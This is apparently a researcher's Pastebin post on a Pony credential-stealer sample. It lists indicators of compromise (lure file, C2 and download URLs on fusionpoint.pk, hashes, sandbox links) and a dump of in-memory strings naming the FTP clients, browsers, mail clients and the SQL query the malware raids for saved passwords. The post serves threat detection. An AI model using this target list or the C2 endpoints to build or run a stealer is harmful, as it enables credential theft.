Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- found by @neonprimetime security
- #pony #opendir #malware
- Subject FW: Bank Copy
- Bank Copy Confirmation.ppt
- fusionpoint[.]pk/wptheme/nel/hawk.exe
- fusionpoint[.]pk/wptheme/nel/gate.php
- https://www.hybrid-analysis.com/sample/1ed23307f87ab31507a473474343880f50f982409f659a6c5b9919713028d0b5?environmentId=100
- https://app.any.run/tasks/e5bad6d9-4bf9-4041-8fc1-43ebe26762d3
- Bank Copy Confirmation.ppt
- 17b52e5811b23b6e4ddab049e01b6e7a
- Hxxp://fusionpoint[.]pk
- Hawk.exe
- 9F19E28B9127692C96B12A9CF46A8A7F
- PAYMENT CONFIRMATION.exe
- BE1A3FF797187F1C5DF0508D4197E3C2
- 1351125.exe
- 9F19E28B9127692C96B12A9CF46A8A7F
- 1363343.bat
- interesting in-memory strings
- 0x64fe58 (42): http://fusionpoint.pk/wptheme/nel/gate.php
- 0x64ff58 (42): http://fusionpoint.pk/wptheme/nel/hawk.exe
- 0x65067a (243): POST %s HTTP/1.0
- Host: %s
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Content-Length: %lu
- Connection: close
- Content-Type: application/octet-stream
- Content-Encoding: binary
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- 0x65076e (15): Content-Length:
- 0x650788 (155): GET %s HTTP/1.0
- Host: %s
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- 0x650837 (50): {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
- 0x65086a (19): GetNativeSystemInfo
- 0x65087e (12): kernel32.dll
- 0x65088b (14): IsWow64Process
- 0x65089a (30): Software\Far\Plugins\FTP\Hosts
- 0x6508b9 (31): Software\Far2\Plugins\FTP\Hosts
- 0x6508d9 (38): Software\Far Manager\Plugins\FTP\Hosts
- 0x650900 (39): Software\Far\SavedDialogHistory\FTPHost
- 0x650928 (40): Software\Far2\SavedDialogHistory\FTPHost
- 0x650951 (47): Software\Far Manager\SavedDialogHistory\FTPHost
- 0x65099d (11): wcx_ftp.ini
- 0x6509b2 (10): InstallDir
- 0x6509bd (10): FtpIniName
- 0x6509c8 (34): Software\Ghisler\Windows Commander
- 0x6509eb (32): Software\Ghisler\Total Commander
- 0x650a1d (16): \Ipswitch\WS_FTP
- 0x650a60 (45): Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
- 0x650a8e (53): Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
- 0x650ac4 (45): Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
- 0x650af2 (53): Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
- 0x650b28 (45): Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
- 0x650b56 (53): Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
- 0x650b8c (20): \GlobalSCAPE\CuteFTP
- 0x650ba1 (24): \GlobalSCAPE\CuteFTP Pro
- 0x650bba (25): \GlobalSCAPE\CuteFTP Lite
- 0x650be5 (19): Software\FlashFXP\3
- 0x650bf9 (17): Software\FlashFXP
- 0x650c0b (19): Software\FlashFXP\4
- 0x650c1f (17): InstallerDathPath
- 0x650c36 (12): Install Path
- 0x650c43 (10): DataFolder
- 0x650c4e (10): \Sites.dat
- 0x650c59 (10): \Quick.dat
- 0x650c64 (12): \History.dat
- 0x650c71 (11): \FlashFXP\3
- 0x650c7d (11): \FlashFXP\4
- 0x650c89 (10): \FileZilla
- 0x650c94 (16): \sitemanager.xml
- 0x650ca5 (18): \recentservers.xml
- 0x650cb8 (14): \filezilla.xml
- 0x650cc7 (18): Software\FileZilla
- 0x650cda (25): Software\FileZilla Client
- 0x650cf4 (11): Install_Dir
- 0x650d14 (10): Remote Dir
- 0x650d1f (11): Server Type
- 0x650d2b (11): Server.Host
- 0x650d37 (11): Server.User
- 0x650d43 (11): Server.Pass
- 0x650d4f (11): Server.Port
- 0x650d60 (10): ServerType
- 0x650d6b (16): Last Server Host
- 0x650d7c (16): Last Server User
- 0x650d8d (16): Last Server Pass
- 0x650d9e (16): Last Server Port
- 0x650daf (16): Last Server Path
- 0x650dc0 (16): Last Server Type
- 0x650dd1 (13): FTP Navigator
- 0x650ddf (13): FTP Commander
- 0x650ded (11): ftplist.txt
- 0x650df9 (21): \BulletProof Software
- 0x650e19 (36): Software\BPFTP\Bullet Proof FTP\Main
- 0x650e3e (57): Software\BulletProof Software\BulletProof FTP Client\Main
- 0x650e78 (39): Software\BPFTP\Bullet Proof FTP\Options
- 0x650ea0 (60): Software\BulletProof Software\BulletProof FTP Client\Options
- 0x650edd (14): Software\BPFTP
- 0x650eec (15): LastSessionFile
- 0x650f05 (11): InstallDir1
- 0x650f20 (13): Favorites.dat
- 0x650f2e (11): History.dat
- 0x650f3a (10): addrbk.dat
- 0x650f59 (17): Software\TurboFTP
- 0x650f6b (11): installpath
- 0x650f77 (19): Software\Sota\FFFTP
- 0x650f8b (14): CredentialSalt
- 0x650f9a (15): CredentialCheck
- 0x650faa (27): Software\Sota\FFFTP\Options
- 0x651010 (11): HostDirName
- 0x65101c (45): Software\CoffeeCup Software\Internet\Profiles
- 0x65104a (30): Software\FTPWare\COREFTP\Sites
- 0x651084 (12): profiles.xml
- 0x651091 (13): \FTP Explorer
- 0x65109f (59): Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
- 0x6510e3 (30): Software\FTP Explorer\Profiles
- 0x65110b (12): PasswordType
- 0x651128 (11): InitialPath
- 0x651134 (11): FtpSite.xml
- 0x65114f (24): _VanDyke\Config\Sessions
- 0x651172 (25): Software\VanDyke\SecureFX
- 0x65118c (11): Config Path
- 0x6511a1 (10): \sites.xml
- 0x6511b5 (12): RushSite.xml
- 0x6511e3 (31): Software\Cryer\WebSitePublisher
- 0x65120d (11): bitkinex.ds
- 0x651239 (28): Software\ExpanDrive\Sessions
- 0x651256 (11): \ExpanDrive
- 0x651262 (10): \drives.js
- 0x65126d (14): "password" : "
- 0x65127f (19): Software\ExpanDrive
- 0x651293 (15): ExpanDrive_Home
- 0x6512d0 (44): Software\NCH Software\ClassicFTP\FTPAccounts
- 0x651307 (11): FtpUserName
- 0x651313 (11): FtpPassword
- 0x65131f (12): _FtpPassword
- 0x65132c (12): FtpDirectory
- 0x651339 (36): SOFTWARE\NCH Software\Fling\Accounts
- 0x65135e (24): Software\FTPClient\Sites
- 0x651377 (34): Software\SoftX.org\FTPClient\Sites
- 0x6513a4 (11): ftplast.osd
- 0x6513b0 (26): \GPSoftware\Directory Opus
- 0x6513cb (19): \SharedSettings.ccs
- 0x6513df (25): \SharedSettings_1_0_5.ccs
- 0x6513f9 (22): \SharedSettings.sqlite
- 0x651410 (28): \SharedSettings_1_0_5.sqlite
- 0x65142d (19): \CoffeeCup Software
- 0x651449 (10): unleap.exe
- 0x651468 (17): \LeapWare\LeapFTP
- 0x65147a (17): SOFTWARE\LeapWare
- 0x65148c (11): InstallPath
- 0x6514bb (15): RemoteDirectory
- 0x6514cb (10): PortNumber
- 0x6514d6 (10): FSProtocol
- 0x6514e1 (23): Software\Martin Prikryl
- 0x6514f9 (13): \32BitFtp.ini
- 0x651507 (11): NDSites.ini
- 0x651533 (13): RootDirectory
- 0x651546 (54): Software\South River Technologies\WebDrive\Connections
- 0x65157d (10): ServerType
- 0x651588 (11): FTP CONTROL
- 0x6515dc (24): _Software\Opera Software
- 0x6515f5 (15): Last Directory3
- 0x651605 (17): Last Install Path
- 0x651617 (29): Opera.HTML\shell\open\command
- 0x651635 (15): wiseftpsrvs.bin
- 0x65164d (15): Software\AceBIT
- 0x651661 (63): SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
- 0x6516a1 (63): SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
- 0x6516e1 (15): wiseftpsrvs.ini
- 0x6516f1 (11): wiseftp.ini
- 0x6516fd (14): FTPVoyager.ftp
- 0x65170c (13): FTPVoyager.qc
- 0x65171a (14): \RhinoSoft.com
- 0x65173b (12): NSS_Shutdown
- 0x651748 (22): NSSBase64_DecodeBuffer
- 0x65175f (16): SECITEM_FreeItem
- 0x651770 (23): PK11_GetInternalKeySlot
- 0x651788 (17): PK11_Authenticate
- 0x65179a (15): PK11SDR_Decrypt
- 0x6517aa (13): PK11_FreeSlot
- 0x6517d9 (11): sqlite3.dll
- 0x6517e5 (12): sqlite3_open
- 0x6517f2 (13): sqlite3_close
- 0x651800 (15): sqlite3_prepare
- 0x651810 (12): sqlite3_step
- 0x65181d (20): sqlite3_column_bytes
- 0x651832 (19): sqlite3_column_blob
- 0x651847 (14): mozsqlite3.dll
- 0x651856 (12): sqlite3_open
- 0x651863 (13): sqlite3_close
- 0x651871 (15): sqlite3_prepare
- 0x651881 (12): sqlite3_step
- 0x65188e (20): sqlite3_column_bytes
- 0x6518a3 (19): sqlite3_column_blob
- 0x6518d8 (12): profiles.ini
- 0x6518ed (10): IsRelative
- 0x651910 (14): signons.sqlite
- 0x65191f (11): signons.txt
- 0x65192b (12): signons2.txt
- 0x651938 (12): signons3.txt
- 0x651951 (69): SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
- 0x65199f (17): \Mozilla\Firefox\
- 0x6519b1 (16): Software\Mozilla
- 0x6519e3 (16): fireFTPsites.dat
- 0x6519fe (19): \Mozilla\SeaMonkey\
- 0x651a18 (15): \Flock\Browser\
- 0x651a30 (18): \Mozilla\Profiles\
- 0x651a43 (17): Software\LeechFTP
- 0x651a65 (12): bookmark.dat
- 0x651a72 (12): SiteInfo.QFP
- 0x651a84 (13): Favorites.dat
- 0x651aa2 (59): CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
- 0x651ade (11): servers.xml
- 0x651aea (10): \FTPGetter
- 0x651af5 (10): ESTdb2.dat
- 0x651b0a (14): \Estsoft\ALFTP
- 0x651b19 (17): Internet Explorer
- 0x651b2b (23): WininetCacheCredentials
- 0x651b43 (19): MS IE FTP Passwords
- 0x651b98 (58): Software\Microsoft\Internet Explorer\IntelliForms\Storage2
- 0x651bd3 (48): http://www.facebook.com/
- 0x651c09 (72): abe2869f-9b47-4cd9-a358-c22904dba7f7
- 0x651c53 (19): Microsoft_WinInet_*
- 0x651c6e (21): Software\Adobe\Common
- 0x651c84 (11): SiteServers
- 0x651c90 (18): SiteServer %d\Host
- 0x651ca3 (20): SiteServer %d\WebUrl
- 0x651cb8 (30): SiteServer %d\Remote Directory
- 0x651cd7 (18): SiteServer %d-User
- 0x651cea (21): SiteServer %d-User PW
- 0x651d00 (11): %s\Keychain
- 0x651d0c (18): SiteServer %d\SFTP
- 0x651d3c (10): Login Data
- 0x651d47 (15): SQLite format 3
- 0x651d63 (10): CONSTRAINT
- 0x651d93 (10): origin_url
- 0x651d9e (14): password_value
- 0x651dad (14): username_value
- 0x651dd4 (14): \Google\Chrome
- 0x651ded (11): \ChromePlus
- 0x651df9 (19): Software\ChromePlus
- 0x651e0d (11): Install_Dir
- 0x651e60 (10): \Epic\Epic
- 0x651e86 (14): \Visicom Media
- 0x651eac (18): \Global Downloader
- 0x651ee7 (12): LastPassword
- 0x651ef4 (11): LastAddress
- 0x651f12 (36): Software\FlashPeak\BlazeFtp\Settings
- 0x651f46 (29): FTP++.Link\shell\open\command
- 0x651f6a (15): Connections.txt
- 0x651f93 (13): \SiteDesigner
- 0x651fa1 (75): SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
- 0x651ff5 (10): \NetSarang
- 0x652014 (14): password 51:b:
- 0x652023 (11): username:s:
- 0x65202f (15): full address:s:
- 0x652063 (29): SOFTWARE\Robo-FTP 3.7\Scripts
- 0x652081 (32): SOFTWARE\Robo-FTP 3.7\FTPServers
- 0x6520ac (10): FTP File%d
- 0x6520c0 (10): ServerName
- 0x6520d2 (16): InitialDirectory
- 0x6520e3 (10): PortNumber
- 0x6520ee (10): ServerType
- 0x65212b (30): Software\LinasFTP\Site Manager
- 0x65215e (10): Remote Dir
- 0x652169 (10): \Cyberduck
- 0x65217a (11): user.config
- 0x652186 (15): <setting name="
- 0x6521a0 (35): Software\SimonTatham\PuTTY\Sessions
- 0x6521df (10): PortNumber
- 0x6521ea (12): TerminalType
- 0x6521f7 (10): NppFTP.xml
- 0x652202 (10): \Notepad++
- 0x65220d (27): Software\CoffeeCup Software
- 0x652229 (22): FTP destination server
- 0x652240 (20): FTP destination user
- 0x652255 (24): FTP destination password
- 0x65226e (20): FTP destination port
- 0x652283 (23): FTP destination catalog
- 0x65229b (12): FTP profiles
- 0x6522b1 (12): ftpshell.fsi
- 0x6522be (31): Software\MAS-Soft\FTPInfo\Setup
- 0x6522ef (14): ServerList.xml
- 0x652308 (11): ftpsite.ini
- 0x652314 (17): FastStone Browser
- 0x652326 (10): FTPList.db
- 0x652331 (23): \MapleStudio\ChromePlus
- 0x652349 (38): Software\Nico Mak Computing\WinZip\FTP
- 0x652370 (43): Software\Nico Mak Computing\WinZip\mru\jobs
- 0x6523db (11): project.ini
- 0x6523ec (38): {74FF1730-B1F2-4D88-926B-1568FAE61DB7}
- 0x652413 (10): NovaFTP.db
- 0x65241e (19): \INSoftware\NovaFTP
- 0x652432 (10): .oeaccount
- 0x65244f (15): <POP3_Password2
- 0x65245f (15): <SMTP_Password2
- 0x65246f (15): <IMAP_Password2
- 0x65247f (19): <HTTPMail_Password2
- 0x652494 (28): \Microsoft\Windows Live Mail
- 0x6524b1 (36): Software\Microsoft\Windows Live Mail
- 0x6524d6 (23): \Microsoft\Windows Mail
- 0x6524ee (31): Software\Microsoft\Windows Mail
- 0x65250e (28): Software\RimArts\B2\Settings
- 0x652533 (10): DataDirBak
- 0x65253e (11): Mailbox.ini
- 0x65254a (25): Software\Poco Systems Inc
- 0x652569 (15): \PocoSystem.ini
- 0x65258a (12): accounts.ini
- 0x6525a1 (20): Software\IncrediMail
- 0x6525b6 (12): EmailAddress
- 0x6525c3 (10): Technology
- 0x6525e0 (10): PopAccount
- 0x6525eb (11): PopPassword
- 0x6525f7 (10): SmtpServer
- 0x65260b (11): SmtpAccount
- 0x652617 (12): SmtpPassword
- 0x652624 (11): account.cfg
- 0x652630 (11): account.cfn
- 0x65264f (21): Software\RIT\The Bat!
- 0x652665 (33): Software\RIT\The Bat!\Users depot
- 0x652687 (17): Working Directory
- 0x652699 (10): ProgramDir
- 0x6526ba (18): SMTP Email Address
- 0x6526cd (11): SMTP Server
- 0x6526d9 (11): POP3 Server
- 0x6526e5 (14): POP3 User Name
- 0x6526f4 (14): SMTP User Name
- 0x652703 (18): NNTP Email Address
- 0x652716 (14): NNTP User Name
- 0x652725 (11): NNTP Server
- 0x652731 (11): IMAP Server
- 0x65273d (14): IMAP User Name
- 0x65275c (15): HTTP Server URL
- 0x652780 (18): HTTPMail User Name
- 0x652793 (15): HTTPMail Server
- 0x6527cd (14): POP3 Password2
- 0x6527dc (14): IMAP Password2
- 0x6527eb (14): NNTP Password2
- 0x6527fa (18): HTTPMail Password2
- 0x65280d (14): SMTP Password2
- 0x65281d (13): POP3 Password
- 0x65282b (13): IMAP Password
- 0x652839 (13): NNTP Password
- 0x652847 (13): HTTP Password
- 0x652855 (13): SMTP Password
- 0x652864 (52): Software\Microsoft\Internet Account Manager\Accounts
- 0x652899 (10): Identities
- 0x6528a4 (62): Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
- 0x6528e3 (117): Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
- 0x652959 (89): Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- 0x6529b3 (43): Software\Microsoft\Internet Account Manager
- 0x6529f1 (14): identification
- 0x652a00 (11): identitymgr
- 0x652a0c (25): inetcomm server passwords
- 0x652a26 (33): outlook account manager passwords
- 0x652a48 (10): identities
- 0x652a53 (50): {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
- 0x652a86 (11): Thunderbird
- 0x652a92 (12): \Thunderbird
- 0x652aa9 (11): ftplist.txt
- 0x652c4d (11): Client Hash
- 0x652c59 (16): STATUS-IMPORT-OK
- 0x652c86 (13): "%s"
- 0x652c94 (13): ShellExecuteA
Add Comment
Please, Sign In to add comment